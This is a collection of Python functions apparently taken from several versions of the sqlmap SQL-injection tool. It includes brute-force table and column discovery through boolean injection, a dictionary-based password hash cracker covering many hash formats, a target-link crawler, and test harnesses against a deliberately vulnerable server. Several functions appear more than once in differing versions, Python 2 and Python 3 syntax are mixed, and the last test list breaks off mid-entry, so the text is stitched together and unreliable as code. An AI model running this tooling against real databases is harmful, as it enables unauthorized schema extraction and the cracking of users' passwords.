def tableExistsThread(): while count[0] < length and kb.threadContinue: tbllock.acquire() table = safeSQLIdentificatorNaming(tables[count[0]]) count[0] += 1 tbllock.release() if conf.db and not conf.db.endswith(METADB_SUFFIX): fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName))) iolock.acquire() if result and table.lower() not in items: retVal.append(table) items.add(table.lower()) dataToSessionFile("[%s][%s][%s][TABLE_EXISTS][%s]\n" % (conf.url,\ kb.injection.place, safeFormatString(conf.parameters[kb.injection.place]),\ safeFormatString(fullTableName))) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release()
def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.value.append(column) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release()
def __bruteProcessVariantA(attack_info, hash_regex, wordlist, suffix, retVal, proc_id, proc_count): count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password = word, uppercase = False) count += 1 if current in hashes: for item in list(attack_info): ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif proc_id == 0 and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except Exception, msg: print msg warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass
def __bruteProcessVariantB(user, hash_, kwargs, hash_regex, wordlist, suffix, retVal, found, proc_id, proc_count): count = 0 rotator = 0 try: for word in wordlist: if found.value: break current = __functions__[hash_regex](password = word, uppercase = False, **kwargs) count += 1 if not isinstance(word, basestring): continue if suffix: word = word + suffix try: if hash_ == current: if hash_regex == HASH.ORACLE_OLD: #only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif proc_id == 0 and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass
def smokeTest(): """ Runs the basic smoke testing of a program """ retVal = True count, length = 0, 0 if not checkIntegrity(): retVal = False for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception as ex: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal
def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if ( conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD) ): fullTableName = "%s%s%s" % ( conf.db, ".." if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else ".", table, ) else: fullTableName = table result = inject.checkBooleanExpression( "%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName)) ) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not hasattr(conf, "api"): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % ( time.strftime("%X"), unsafeSQLIdentificatorNaming(table), ) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % ( threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit), ) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release()
def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.countLock.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.countLock.release() else: kb.locks.countLock.release() break if conf.db and METADB_SUFFIX not in conf.db: fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.ioLock.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.outputs.append(table) threadData.shared.unique.add(table.lower()) dataToSessionFile("[%s][%s][%s][TABLE_EXISTS][%s]\n" % (conf.url,\ kb.injection.place, safeFormatString(conf.parameters[kb.injection.place]),\ safeFormatString(fullTableName))) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (threadData.shared.count, threadData.shared.limit, round(100.0*threadData.shared.count/threadData.shared.limit), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.ioLock.release()
def vulnTest(): """ Runs the testing against 'vulnserver' """ retVal = True count, length = 0, 6 def _thread(): vulnserver.init(quiet=True) vulnserver.run() thread = threading.Thread(target=_thread) thread.daemon = True thread.start() for options, checks in ( ("--version", ("1.", "#")), ("--flush-session", ("Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "back-end DBMS: SQLite", "3 columns")), ("--banner --schema --dump -T users --binary-fields=surname --where 'id>3'", ("banner: '3", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("--all", ("5 entries", "luther", "blisset", "fluffy", "ming", "NULL", "nameisnull")), ("--technique=B --hex --fresh-queries --sql-query='SELECT 987654321'", ("single-thread", ": '987654321'",)), ("--technique=T --fresh-queries --sql-query='SELECT 987654321'", (": '987654321'",)), ): output = shellExec("python sqlmap.py -u http://%s:%d/?id=1 --batch %s" % (vulnserver.LISTEN_ADDRESS, vulnserver.LISTEN_PORT, options)) if not all(check in output for check in checks): retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def columnExistsThread(): while count[0] < length and kb.threadContinue: collock.acquire() column = safeSQLIdentificatorNaming(columns[count[0]]) count[0] += 1 collock.release() result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s)", (column, table))) iolock.acquire() if result: retVal.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release()
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] user_hash = [] processException = False foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): try: item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.WORDPRESS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): hash_ = hash_.lower() if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): item = [(user, hash_.decode("base64").encode("hex")), {}] elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.APACHE_SHA1): item = [(user, hash_), {}] elif hash_regex in (HASH.SSHA,): item = [(user, hash_), {"salt": hash_.decode("base64")[20:]}] elif hash_regex in (HASH.SSHA256,): item = [(user, hash_), {"salt": hash_.decode("base64")[32:]}] elif hash_regex in (HASH.SSHA512,): item = [(user, hash_), {"salt": hash_.decode("base64")[64:]}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {"salt": hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {"salt": hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {"salt": hash_[0:2]}] elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT): item = [(user, hash_), {"salt": hash_.split('$')[2], "magic": "$%s$" % hash_.split('$')[1]}] elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD): item = [(user, hash_), {"salt": hash_.split(':')[-1]}] elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1): item = [(user, hash_), {"salt": hash_.split('$')[1]}] elif hash_regex in (HASH.WORDPRESS,): if ITOA64.index(hash_[3]) < 32: item = [(user, hash_), {"salt": hash_[4:12], "count": 1 << ITOA64.index(hash_[3]), "prefix": hash_[:12]}] else: warnMsg = "invalid hash '%s'" % hash_ logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) except (binascii.Error, IndexError): pass if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD,): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with 
list of dictionary files" choice = readInput(message, default='1') try: if choice == '2': message = "what's the custom dictionary's location?\n" dictPath = readInput(message) if dictPath: dictPaths = [dictPath] logger.info("using custom dictionary") elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = filter(None, dictPaths) for dictPath in dictPaths: checkFile(dictPath) if os.path.splitext(dictPath)[1].lower() == ".zip": _ = zipfile.ZipFile(dictPath, 'r') if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % dictPath raise SqlmapDataException(errMsg) else: _.open(_.namelist()[0]) kb.wordlists = dictPaths except Exception, ex: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) # Algorithms without extra arguments (e.g. salt and/or username) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found 
or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine()
def tableExists(tableFile, regex=None): result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException, errMsg tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.outputs = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db: fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.outputs.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (threadData.shared.count, threadData.shared.limit, round(100.0*threadData.shared.count/threadData.shared.limit), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.outputs: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in map(lambda x: (conf.db, x), threadData.shared.outputs): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
def crawl(target, post=None, cookie=None): if not target: return try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = OrderedSet() threadData.shared.formsFound = False def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue elif conf.crawlExclude and re.search( conf.crawlExclude, current): dbgMsg = "skipping '%s'" % current logger.debug(dbgMsg) continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, post=post, cookie=None, crawling=True, raise404=False)[0] except SqlmapConnectionException as ex: errMsg = "connection exception detected ('%s'). skipping " % getSafeExString( ex) errMsg += "URL '%s'" % current logger.critical(errMsg) except SqlmapSyntaxException: errMsg = "invalid URL detected. skipping '%s'" % current logger.critical(errMsg) except _http_client.InvalidURL as ex: errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString( ex) errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, six.text_type): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') tags += re.finditer( r'(?i)\s(href|src)=["\'](?P<href>[^>"\']+)', content) tags += re.finditer( r'(?i)window\.open\(["\'](?P<href>[^)"\']+)["\']', content) for tag in tags: href = tag.get("href") if hasattr( tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[ 0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = _urllib.parse.urljoin( current, htmlUnescape(href)) # flag to know if we are dealing with the same target host _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if (extractRegexResult( r"\A[^?]+\.(?P<result>\w+)(\?|\Z)", url) or "" ).lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search( r"(.*?)\?(.+)", url) and not re.search( r"\?(v=)?\d+\Z", url ) and not re.search( r"(?i)\.(js|css)(\?|\Z)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass except ValueError: # for non-valid links pass finally: if conf.forms: threadData.shared.formsFound |= len( findPageForms(content, current, False, True)) > 0 if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % ( threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout( "\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) _ = re.sub(r"(?<!/)/(?!/).*", "", target) if _: if target.strip('/') != _.strip('/'): threadData.shared.unprocessed.add(_) if re.search(r"\?.*\b\w+=", target): threadData.shared.value.add(target) if kb.checkSitemap is None: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " kb.checkSitemap = readInput(message, default='N', boolean=True) if kb.checkSitemap: found = True items = None url = _urllib.parse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) except SqlmapConnectionException as ex: if "page not found" in getSafeExString(ex): found = False 
logger.warn("'sitemap.xml' not found") except: pass finally: if found: if items: for item in items: if re.search(r"(.*?)\?(.+)", item): threadData.shared.value.add(item) if conf.crawlDepth > 1: threadData.shared.unprocessed.update(items) logger.info("%s links found" % ("no" if not items else len(items))) if not conf.bulkFile: infoMsg = "starting crawler for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. ramusql " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: if not (conf.forms and threadData.shared.formsFound): warnMsg = "no usable links found (with GET parameters)" if conf.forms: warnMsg += " or forms" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add( (urldecode(url, kb.pageEncoding), None, None, None, None)) if kb.targets: if kb.normalizeCrawlingChoice is None: message = "do you want to normalize " message += "crawling results [Y/n] " kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True) if kb.normalizeCrawlingChoice: seen = set() results = OrderedSet() for target in kb.targets: value = "%s%s%s" % (target[0], '&' if '?' in target[0] else '?', target[2] or "") match = re.search(r"/[^/?]*\?.+\Z", value) if match: key = re.sub(r"=[^=&]*", "=", match.group(0)).strip("&?") if '=' in key and key not in seen: results.add(target) seen.add(key) kb.targets = results storeResultsToFile(kb.targets)
def vulnTest(): """ Runs the testing against 'vulnserver' """ TESTS = ( ("-h", ("to see full list of options run with '-hh'",)), ("--dependencies --deprecations", ("sqlmap requires", "third-party library", "~DeprecationWarning:")), ("-u <url> --data=\"reflect=1\" --flush-session --wizard --disable-coloring", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")), ("-u <url> --data=\"code=1\" --code=200 --technique=B --banner --no-cast --flush-session", ("back-end DBMS: SQLite", "banner: '3.", "~COALESCE(CAST(")), (u"-c <config> --flush-session --output-dir=\"<tmpdir>\" --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible", "as the output directory")), (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'",)), ("-m <multiple> --flush-session --technique=B --banner", ("/3] URL:", "back-end DBMS: SQLite", "banner: '3.")), ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")), ("-u \"<url>&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)), ("--list-tampers", ("between", "MySQL", "xforwardedfor")), ("-r <request> --flush-session -v 5 --test-skip=\"heavy\" --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")), ("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind")), ("-l <log> --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), ("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), ("-u <base> --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <base64> -p id --base64=id --data=\"base64=true\" --flush-session --banner --technique=B", ("banner: '3.",)), ("-u <base64> -p id --base64=id --data=\"base64=true\" --flush-session --tables --technique=U", (" users ",)), ("-u <url> --flush-session --banner --technique=B --disable-precon --not-string \"no results\"", ("banner: '3.",)), ("-u <url> --flush-session --encoding=gbk --banner --technique=B --first=1 --last=2", ("banner: '3.'",)), ("-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), ("-u <base> --flush-session --data=\"{\\\"id\\\": 1}\" --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <base> --flush-session -H \"Foo: Bar\" -H \"Sna: Fu\" --data=\"<root><param name=\\\"id\\\" value=\\\"1*\\\"/></root>\" --union-char=1 --mobile --answers=\"smartphone=3\" --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: 
